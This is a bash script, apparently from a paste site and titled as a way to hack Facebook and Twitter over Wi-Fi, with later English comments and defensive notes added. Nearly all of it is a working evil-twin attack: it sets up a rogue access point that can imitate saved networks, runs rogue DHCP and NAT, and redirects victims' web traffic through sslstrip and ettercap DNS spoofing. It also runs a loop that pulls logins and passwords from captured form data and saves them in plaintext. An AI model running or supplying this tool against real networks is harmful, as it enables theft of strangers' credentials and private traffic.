juansacco

Gemelo.sh - Hackeando Facebook y Twitter desde WIFI

Sep 4th, 2013
  1. #!/bin/bash
     # Annotated copy. The script turns the operator's machine into a rogue ("evil twin")
     # access point and passes its clients' traffic through local interception tools.
     # This first section only decides which DNS servers the rogue DHCP server will hand out:
     # it reuses the resolvers already configured on the host.
  2. var=$(grep "nameserver" /etc/resolv.conf | awk '{print $2}' |wc -l) # count the number of nameservers in resolv.conf
  3. if [[ $var = 1 ]];then  # if 1, use it in dhcpd.conf
  4.   apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}')
  5. elif [[ $var > 1 ]];then  # several resolvers: build an "a, b, c" list for dhcpd.conf
  6.   apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ',')
  7.   apdns=${apdns//,/", "}                           # add a space after all commas
  8.   apdns=${apdns%", "}                              # delete the final comma/space
  9. else apdns=0 # default in case resolv.conf is empty, which would prevent dhcpd starting
  10. fi
  11.  
  12. RED=$(tput setaf 1)  # terminal colour sequences used by the prompts and status messages below
  13. GREEN=$(tput bold ; tput setaf 2)
  14. YELLOW=$(tput bold ; tput setaf 3)
  15.  
  16. # Network questions: interactively collect the uplink gateway and interface, the wireless
      # interface to use for the access point, and the network name (ESSID) it will advertise.
  17. echo $GREEN
  18. echo "Juan Sacco - @juansacco - juansacco@gmail.com"
  19. echo "Wifi - Gemelo Malvado MITM"
  20. echo
  21. echo $YELLOW
  22. ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Internet Interface :", $5}'
  23. echo
  24. iface=$(ip route show | awk '(NR == 1) { print $5}')  # defaults are read from the first line of `ip route show`
  25. gateway=$(ip route show | awk '(NR == 1) { print $3}')
  26. echo $GREEN
  27. echo "Enter the networks gateway IP address or press enter to use $gateway:"
  28. echo $YELLOW
  29. read -e gatewayip
  30. if [ "$gatewayip" = "" ];then
  31.    gatewayip=$gateway
  32.    echo "$gatewayip selected as default."
  33. fi
  34. echo $GREEN
  35. echo "Enter your interface that is connected to the internet or press enter to use $iface:"
  36. echo $YELLOW
  37. read -e internet_interface
  38. if [ "$internet_interface" = "" ];then
  39.    internet_interface=$iface
  40.    echo "$internet_interface selected as default."
  41. fi
  42. echo $GREEN
  43. echo "Select your interface to be used for the fake AP:"
  44. echo $YELLOW
  45. interfaces=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`  # interface names from `ip link`, minus any containing "lo"
  46. select fakeap_interface in $interfaces; do
  47.   break;
  48. done
  49.  
  50. echo $GREEN
  51. echo "Enter the ESSID you would like your rogue AP to be called or press enter to use Fake_AP:"
  52. echo  $YELLOW
  53. read -e ESSID
      # Defensive note: the advertised name is entirely operator-chosen, so a familiar SSID
      # is no evidence that an access point is legitimate.
  54. if [ "$ESSID" = "" ];then
  55.    ESSID="Fake_AP"
  56.    echo "$ESSID selected as default."
  57. fi
  58. echo
  59. sleep 2
  60. clear
  61.  
  62. # Cleaning: stop leftover instances of the tools this script launches (all output and errors discarded)
  63. killall sslstrip &> /dev/null
  64. killall driftnet &> /dev/null
  65. killall airbase-ng &> /dev/null
  66. killall ettercap &> /dev/null
  67. killall looparse &> /dev/null
  68.  
  69. # Start Fake Ap interface: hand the chosen wireless card to airmon-ng
  70. airmon-ng start $fakeap_interface
  71. fakeap=$fakeap_interface  # keep the originally selected name for the window title and teardown
  72. fakeap_interface="mon0"  # from here on the script uses the literal name mon0 for the monitor interface
  73.  
  74. # Dhcpd creation: write the DHCP server configuration that will be served to clients of the access point
  75. SUBNET=$(ip route show | awk '(NR == 2)' | cut -d '/' -f1)
  76. if [ "$SUBNET" = "10.0.0.0" ]; then  # both branches assign the same subnet and gateway; only RANGE differs
  77.   SUBNET="192.168.1.0"
  78.   GATEWAY="192.168.1.1"
  79.   RANGE="192.168.1.20 192.168.1.50"
  80. else
  81.   SUBNET="192.168.1.0"
  82.   GATEWAY="192.168.1.1"
  83.   RANGE="192.168.1.200 192.168.1.220"
  84. fi
  85. mkdir -p /tmp/Airssl  # working directory for the config, log and capture files created by this script
  86. echo "authoritative;
  87.  
  88. default-lease-time 600;
  89. max-lease-time 7200;
  90.  
  91. subnet $SUBNET netmask 255.255.255.0 {
  92. option routers $GATEWAY;
  93. ddns-update-style none;
  94.  
  95. option domain-name-servers $apdns;
  96.  
  97. range $RANGE;
  98.  
  99. }" > /tmp/Airssl/dhcpd.conf  # clients are leased 192.168.1.x addresses with 192.168.1.1 as router and $apdns as DNS
  100.  
  101.  
  102. # Fake ap setup: menu asking whether airbase-ng should answer every probe request or
       # only advertise $ESSID. The loop repeats until the operator enters 1 or 2.
       # Defensive note: as the prompt text below says, answer-all mode depends on clients that
       # auto-connect to remembered networks; disabling auto-join for open networks and pruning
       # saved networks limits that exposure.
  103. while true; do
  104.   sleep 2
  105.   clear
  106.   echo $GREEN
  107.   echo "
  108.  
  109.    Configuring FakeAP...."
  110.  
  111.   echo $YELLOW
  112.   echo "Airbase-ng will run in its most basic mode, would you like to run  airbase-ng in respond to all probes mode?"
  113.   echo
  114.   echo "In this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes, providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly."
  115.   echo  $RED "PLEASE USE THIS OPTION RESPONSIBLY. "
  116.   echo $YELLOW
  117.   echo " 1) Yes"
  118.   echo " 2) No"
  119.   echo -n " #? "
  120.   read yn
  121.   case $yn in
  122.     1 ) AIRBASE=1 ; break ;;  # respond-to-all-probes mode
  123.     2 ) AIRBASE=0 ; break ;;  # advertise only the chosen ESSID
  124.     * ) echo
  125.    echo $RED"wrong choice" ;;
  126. esac
  127. done
  128. sleep 2
  129. clear
  130.  
  131. echo $GREEN  # launch the access point in the mode selected in the menu
  132. echo "
  133.  
  134.    Starting FakeAP..."
  135.  
       # airbase-ng runs inside its own xterm; fakeapid records that xterm's PID so teardown can kill it.
  136. if [ "$AIRBASE" = "1" ]; then
  137.   xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!  # answer-all-probes mode
  138. else
  139.   xterm -bg black -fg green -geometry 153x37+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!  # single network named "$ESSID"
  140. fi
  141. sleep 2
  142.  
  143. # Tables: address at0 (presumably the tap interface airbase-ng creates), make this host a
       # NAT router for the access point's clients, and divert their plain-HTTP traffic to a
       # local proxy port.
  144. echo
  145. echo "
  146.  
  147.    Configuring forwarding tables..." $RED
  148.  
  149. ifconfig lo up
  150. ifconfig at0 up &
  151. sleep 1
  152. ifconfig at0 $GATEWAY netmask 255.255.255.0  # at0 takes the router address advertised in dhcpd.conf
  153. ifconfig at0 mtu 1400
  154. route add -net $SUBNET netmask 255.255.255.0 gw $GATEWAY
  155. iptables --flush  # the next four commands wipe every existing filter/nat rule and user chain on this host
  156. iptables --table nat --flush
  157. iptables --delete-chain
  158. iptables --table nat --delete-chain
  159.  
  160. echo 1 > /proc/sys/net/ipv4/ip_forward  # enable IPv4 forwarding
  161.  
  162. iptables --flush
  163. iptables --table nat --flush
  164. iptables --delete-chain
  165. iptables --table nat --delete-chain
  166. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE  # NAT out of the literal interface eth0
  167. iptables --append FORWARD --in-interface at0 -j ACCEPT
  168. echo 1 > /proc/sys/net/ipv4/ip_forward
  169. iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain && iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE && iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward  # same sequence again, now with the operator-selected uplink interface
  170. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000  # only TCP/80 is diverted, to local port 10000
       # Defensive note: because only port 80 is redirected, sessions that begin over HTTPS are not
       # sent to the proxy. HSTS (ideally preloaded) and browser HTTPS-only modes keep clients from
       # making the initial plain-HTTP request that this interception depends on.
  171. # DHCP: run dhcpd in its own xterm on at0, using the config generated under /tmp/Airssl
  172. echo $GREEN
  173. echo "
  174.  
  175.    Setting up DHCP..."
  176.  
  177. touch /var/run/dhcpd.pid
  178. #chown dhcpd:dhcpd /var/run/dhcpd.pid
  179. xterm -bg black -fg green -geometry 153x37-1+0 -T DHCP -e dhcpd -d -f -cf "/tmp/Airssl/dhcpd.conf" at0 & dchpid=$!  # PID of the xterm, kept for teardown
  180. sleep 2
  181.  
  182. # Sslstrip: background proxy listening on port 10000 (the target of the port-80 redirect),
       # writing its log to /tmp/Airssl/sslstrip.log.
       # Defensive note: this only affects traffic that starts as plain HTTP; HSTS and HTTPS-only
       # browsing remove that starting point.
  183. echo
  184. echo "
  185.  
  186.    Starting sslstrip..." $YELLOW
  187.  
  188. sslstrip -f -p -k -l 10000 -w /tmp/Airssl/sslstrip.log 2> /dev/null & sslstripid=$!  # stderr discarded; PID kept for teardown
  189. sleep 2
  190.  
  191. # Ettercap: text-mode ettercap on at0 with the dns_spoof plugin loaded, run in its own xterm;
       # its -w option points at /tmp/Airssl/etter.cap.
  192. echo $GREEN
  193. echo "
  194.  
  195.    Starting ettercap..."
  196.  
  197. #xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -C -P dns_spoof -i at0 & ettercapid=$!
  198. xterm -bg black -fg green -geometry 153x37+1-0 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -P dns_spoof -q -w /tmp/Airssl/etter.cap -i at0 & ettercapid=$!  # PID of the xterm, kept for teardown
  199. sleep 2
  200.  
  201.  
  202. ############################
  203. ## Copied of yamas script ##
  204. ############################
       # Writes a keyword list (grepcred.txt) and a generated helper script (looparse.sh). In a loop
       # with a 7-second sleep, the helper re-reads sslstrip.log and prints the POST fields whose
       # text matches those keywords, labelled as website, login or password.
       # Defensive note: what surfaces here is form data that passed through the port-80 proxy;
       # credentials sent over TLS that was never downgraded should not appear in that log.
  205. echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/Airssl/grepcred.txt
  206. echo "looparse(){
  207. while :
  208. do
  209.   clear
  210.   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
  211.   cat /tmp/Airssl/sslstrip.log |
  212. awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
  213. awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
  214. egrep -i -f '/tmp/Airssl/grepcred.txt' |
  215. awk -F \"=\" '{if (length(\$2) < 3) print \"\";
  216. else if (\$1 ~/[W]/) print \$0;
  217. else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
  218. else print \"Login = \t\t\", \$2}' |
  219. uniq
  220. sleep 7
  221. done
  222.  }
  223. looparse" > /tmp/Airssl/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
  224. chmod +x /tmp/Airssl/looparse.sh
  225. xterm -bg black -fg green -geometry 153x37-1-0 -T Passwords -e /tmp/Airssl/looparse.sh & looparseid=$! #here's the beauty
  226. ############################
  227. ############################
  228.  
  229. # Driftnet: run driftnet on at0 in the background with its output directory set to a dated
       # folder under /tmp/Airssl (Images_DDMMYY).
  230. echo $GREEN
  231. echo "
  232.  
  233.    Starting driftnet..."
  234.  
  235. mkdir -p "/tmp/Airssl/Images_$(date +%d%m%y)"
  236. driftnet -i at0 -a -d /tmp/Airssl/Images_$(date +%d%m%y) > /dev/null & dritnetid=$!  # PID kept for teardown
  237. sleep 2
  238.  
  239.  
  240. clear  # operator-facing summary follows; the script then blocks on input before saving results and tearing down
  241. echo
  242. echo "
  243.  
  244.    Activated..."
  245.  
  246. echo $YELLOW
  247. echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap.
  248. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to "$HOME/Airssl/etter.cap".
  249. Sslstrip captured passwords will be saved to $HOME/Airssl/passwords.txt.
  250. Driftnet images will be saved to $HOME/Airssl/driftftnetdata"
  251. echo
  252. echo $RED
  253. echo "
  254.  
  255.    IMPORTANT..."
  256.  
  257. echo "After you have finished please close airssl and clean up properly by hitting any key,
  258. if airssl is not closed properly ERRORS WILL OCCUR "
  259.  
  260. read junk  # everything above keeps running until the operator provides input here
  261. echo
  262. mkdir -p $HOME/Airssl  # persistent output directory in the operator's home
  263.  
  264. ############################
  265. ## Copied of yamas script ##
  266. ############################
       # Final pass over sslstrip.log: same keyword filter as the live viewer, with the labelled
       # website/login/password lines appended to a file in the operator's home directory.
       # Forensic note: any harvested credentials end up in plaintext in $HOME/Airssl/passwords.txt.
  267. cat /tmp/Airssl/sslstrip.log |
  268. awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
  269. awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
  270. egrep -i -a -f /tmp/Airssl/grepcred.txt |
  271. awk -F "=" '{if (length($2) < 4) print "";
  272. else if ($1 ~/Website/) print $0;
  273. else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
  274. else print "Login = \t"$2}' |
  275. uniq >> $HOME/Airssl/passwords.txt
  276. if [ -f "$HOME/Airssl/passwords.txt" ]; then  # only checks that the file exists, not that anything was written
  277.    echo $GREEN "Passwords saved !"
  278. else
  279.    echo $RED "Error while saving passwords"
  280. fi
  281. ############################
  282. ############################
  283.  
  284. cp -rf /tmp/Airssl/Images_$(date +%d%m%y) $HOME/Airssl  # copy the dated image folder from the /tmp working directory to $HOME/Airssl
  285. if [ -d "$HOME/Airssl/Images_$(date +%d%m%y)" ]; then
  286.    echo $GREEN "Images saved !"
  287. else
  288.    echo $RED "Error while saving images"
  289. fi
  290.  
  291. cp -rf /tmp/Airssl/etter.cap $HOME/Airssl  # copy the ettercap capture file as well
  292. if [ -f "$HOME/Airssl/etter.cap" ]; then
  293.    echo $GREEN "Capture file saved !"
  294. else
  295.    echo $RED "Error while Capture file"
  296. fi
  297.  
  298. echo $GREEN  # teardown: stop the launched processes, undo forwarding, remove the /tmp working directory
  299. echo "
  300.  
  301.    Cleaning up airssl and resetting iptables..." $YELLOW
  302.  
  303.  
  304. kill ${fakeapid} &> /dev/null  # PIDs recorded with $! when each tool was started; errors discarded
  305. kill ${dchpid} &> /dev/null
  306. kill ${sslstripid} &> /dev/null
  307. kill ${ettercapid} &> /dev/null
  308. kill ${dritnetid} &> /dev/null
  309. kill ${looparseid} &> /dev/null
  310.  
  311. airmon-ng stop $fakeap_interface
  312. airmon-ng stop $fakeap
  313.  
  314. echo "0" > /proc/sys/net/ipv4/ip_forward  # IPv4 forwarding switched back off
  315.  
  316. iptables --flush  # rules are flushed again, not restored: the host is left with empty filter/nat tables
  317. iptables --table nat --flush
  318. iptables --delete-chain
  319. iptables --table nat --delete-chain
  320.  
  321. rm -rf /tmp/Airssl
       # Forensic note: after this point the /tmp/Airssl working directory is gone, while the copies
       # made earlier under $HOME/Airssl (passwords.txt, etter.cap, Images_DDMMYY) remain on disk.
  322.  
  323. echo $GREEN
  324. echo "
  325.  
  326.    Clean up successful..."
  327.  
  328. echo
  329. echo "
  330.  
  331.    Thank you for using airssl, Good Bye..."
  332.  
  333. exit